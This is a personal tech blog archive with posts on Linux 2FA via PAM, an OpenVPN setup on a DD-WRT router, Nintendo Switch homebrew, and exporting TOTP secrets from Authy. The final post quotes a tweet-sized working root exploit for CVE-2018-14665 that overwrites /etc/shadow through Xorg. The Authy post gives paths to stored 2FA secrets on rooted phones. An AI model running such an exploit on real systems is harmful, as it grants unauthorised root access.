v3ritas.TECH

Protecting Linux Login with 2FA

2019 January 212019 January 21 v3ritasLeave a comment

This is definitely not the first time I’ve tried getting this working, but glad I was finally able to. Looks like if I had read a bit more, I never would have run into issues…

By the second or third time I ran into problems, I at least figured out why: with my home directory being encrypted, the “secret” 2FA files could not be accessed & verified.

Now for the fun part… It looks like Google had the instructions for encrypted home directories in the README the whole time.

Encrypted home directories
If your system encrypts home directories until after your users entered their password, you either have to re-arrange the entries in the PAM configuration file to decrypt the home directory prior to asking for the OTP code, or you have to store the secret file in a non-standard location:
auth required pam_google_authenticator.so secret=/var/unencrypted-home/${USER}/.google_authenticator
would be a possible choice. Make sure to set appropriate permissions. You also have to tell your users to manually move their .google_authenticator file to this location.
In addition to “${USER}”, the secret= option also recognizes both “~” and ${HOME} as short-hands for the user’s home directory.
When using the secret= option, you might want to also set the user= option. The latter forces the PAM module to switch to a dedicated hard-coded user id prior to doing any file operations. When using the user= option, you must not include “~” or “${HOME}” in the filename.
The user= option can also be useful if you want to authenticate users who do not have traditional UNIX accounts on your system.

So, after getting through that tedious “reading” thing, I followed their suggestion, & created the “unencrypted-home” directory, moved the ~/.google_authenticator file there, edited /etc/pam.d/common-auth & included the path to the file at the encrypted location. After that… Working as expected!

user@Hostname:~$ cat /etc/pam.d/common-auth | tail -n 1
auth required pam_google_authenticator.so secret=/var/unencrypted-home/${USER}/.google_authenticator

Password “Complexity” Requirement

2019 January 52019 January 5 v3ritasLeave a comment

I actually forget what web site this one, but found this little gem while trying to setup a new account:

I guess my password doesn’t meet their requirements?

No, I didn’t actually make my password “password123” but I would have thought a site warning my against it wouldn’t allow “password”+< something >. The fact that it wouldn’t accept my random password probably should have been my first hint that it was not going to go well.

FINALLY Got my OpenVPN Server Setup on My DD-WRT Router

2019 January 12019 January 1 v3ritasLeave a comment

This took way longer than I would have liked, but at least it seems to be working right now.

After moving recently, I needed to purchase a new router, leaving my rooted Google WiFi AP’s behind. I decided to replace it with a D-LINK AC2600 EXO MU-MIMO Wi-Fi Router. After some more router related fun, I was able to get DD-WRT custom firmware running on the device. With that finally in place, my next project was to get the OpenVPN Server feature enabled. I had all the certificates & keys I needed, it was just a matter of getting the right config in the DD-WRT Admin GUI. Below is what I finally had in the “Additional Config” field that, that ended up working:

push “route 192.168.1.0 255.255.255.0”
push “dhcp-option DNS 192.168.2.1”
server 192.168.2.0 255.255.255.0
verb 5
dev tun0
proto udp4
keepalive 10 120
dh /tmp/openvpn/dh.pem
ca /tmp/openvpn/ca.crt
cert /tmp/openvpn/cert.pem
key /tmp/openvpn/key.pem
script-security 2
# Only use crl-verify if you are using the revoke list – otherwise leave it commented out
# crl-verify /tmp/openvpn/ca.crl
# management parameter allows DD-WRT’s OpenVPN Status web page to access the server’s management port
# port must be 5001 for scripts embedded in firmware to work
# management localhost 5001
Where 192.168.1.0 is my local subnet, & 192.168.2.0 is a subnet I’m assigning to VPN clients.

I haven’t started configuring clients yet, but don’t believe that will be anywhere near as difficult as getting the server running. For reference, below is a history of the commands I ran to get the certificates, keys, etc setup for the server:

v3ritas@Hostname:~/.openvpn/20190101$ history
2956 make-cadir 20190101
2957 cd 20190101/
2958 ls
2959 nano vars
2960 source vars
2961 cp openssl-1.0.0.cnf openssl.cnf
2962 source vars
2963 ./clean-all
2964 ./build-ca
2965 ./build-key-server OpenVPN-Server
2966 ./clean-all
2967 nano vars
2968 ./build-ca
2969 source vars
2970 ./build-ca
2971 ./build-key-server OpenVPN-Server
2972 ./build-dh
2973 ls keys
2974 openvpn –genkey –secret pfs.key
2975 ls keys
2976 cat keys/ca.crt
2977 cat OpenVPN-Server.crt
2978 cat keys/OpenVPN-Server.crt
2979 cat keys/OpenVPN-Server.key
2980 cat keys/dh4096.pem
2981 cat pfs.key
2982 md5 ~/Downloads/factory-to-ddwrt.bin
2983 md5 ~/Downloads/dlink-dir882-a1-webflash.bin
2984 ./build-key Client01
2985 ls keys
2986 cat keys/ca.crt
2987 cat keys/OpenVPN-Server.crt
2988 cat keys/OpenVPN-Server.key
2989 cat keys/dh4096.pem
2990 cat pfs.key
Just of dump of my command history.

Nintendo Switch Theme: Deadpool Playing Pokemon: ClearLayout

2018 December 302018 December 30 v3ritasLeave a comment

Trying to get into Switch theming, so this is my first attempt:

Deadpool Playing Pokemon: ClearLayout screenshot.

Download is available here. I also posted the theme to /r/NXThemes: My First Theme: Deadpool Playing Pokemon: ClearLayout.

New Nintendo Switch Payload: ArgonNX

2018 December 292018 December 29 v3ritasLeave a comment

Guillem96 has a new payload available on GitHub: argon-nx.

As he states in the description there, it’s meant to be used to choose which payload you’d actually like to launch; just use the ArgonNX payload, & then choose from any BIN you have located in the \argon\payloads\ directory. What’s nice about this is that you can choose the logos to go along with each BIN. Still have some work to do, but this is what my selection screen looks like right now:

ArgonNX logos. — Some quick logos I put together to be used with ArgonNX. Crappy screenshot because apparently WordPress \ Gutenberg views BMP files as a security risk… See screenshot below.

Homebrewing ALL THE THINGS

2018 December 132018 December 13 v3ritasLeave a comment

Pretty accurate description of what I’ve been up to recently.

Since getting homebrew running on my Nintendo Switch, I’ve been booting up some old hardware & getting homebrew &\or custom firmware running there. The most recent three after the Switch have been my Nintendo Wii U, PlayStation Vita, & PlayStation 3. I’ve had CFW running on my Vita for a while, but also haven’t turned it on in ages. I came back to some interesting to features in the homebrew scene which was a nice surprise.

It took me a little while to get homebrew up on my Wii U, but was much easier than what I’ve been dealing with on the Switch. Same goes for the PlayStation 3. I’ve not yet gotten a chance to play around much with either system, but hopefully that will change in the upcoming weeks. I’ll be sure to post more information then, but in the meantime, here are some helpful sites I used in getting homebrew running on my Wii U & PS3:

Moving from Authy to Another 2FA App

2018 November 112018 November 11 v3ritasLeave a comment

Despite the convenience of having Authy’s ability to sync across devices, I decided I wanted to change my 2FA app to Android’s andOTP. To do this (without unenrolling & re-enrolling myself in 2FA for my 50+ services), I needed to find a way to export my secrets from Authy. I did find a few posts on the topic, but didn’t have any luck with those guides. Most seemed to be a variation on the same process of getting the secrets from the Authy Chrome extension.

GitHubGist: Generating Authy passwords on other authenticators

What I did end up finding that finally worked, was to pull the XML containing details on each entry in Authy, thanks to this post: GBATemp: extract your totp keys from authy using chrome:

Good job, this tutorial is great for people who need to extract their keys out of Authy without needing a rooted Android/Jailbroken iPhone to grab them from the mobile app.
For people with rooted Android phones, the totp keys are stored here:
/data/data/com.authy.authy/shared_prefs/com.authy.storage.tokens.authenticator.xml
The filepath is what I was looking for

In the past, when I was using Google Authenticator, you had the ability to pull the database from the Android app, assuming you were rooted. The above process seems to be similar, just for the Authy app, instead of Google Authenticator: /data/data/com.google.android.apps.authenticator2/databases/databases.

This post is for my own reference, & for anyone else that may want to move from Authy, to another authenticator app.

Nintendo Switch: ReiNX Splashscreen

2018 November 82018 November 8 v3ritasLeave a comment

Now that I’ve finally started getting homebrew running on my Switch, figured I’d put together a quick ReiNX splashscreen, similar to one of the Luma3DS ones:

My first attempt at a “BIOS” boot splashscreen for the Switch.

Scammers Using Microsoft’s Support Site

2018 October 262018 October 26 v3ritasLeave a comment

I just came across this video (posted yesterday), where scammers are leveraging Microsoft’s legitimate support site at https://support.microsoft.com/help. This was after I received a fake Microsoft support call. Unfortunately, I didn’t have a dummy VM ready to waste their time, but glad I found out about the use of Microsoft’s site. Because Microsoft uses LogMeIn, their support site seems to just forward the code to LogMeIn to start the session.

See the video below for how the site is used:

CVE-2018-14665: Exploit in a Tweet

2018 October 262018 October 26 v3ritasLeave a comment

Hacker Fantastic has another Tweet-able exploit for a system:

#CVE-2018-14665 – a LPE exploit via https://t.co/eax3fvaAjE fits in a tweet

cd /etc; Xorg -fp “root::16431:0:99999:7:::” -logfile shadow :1;su

Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.— Hacker Fantastic (@hackerfantastic) October 25, 2018
Twitter: @HackerFantastic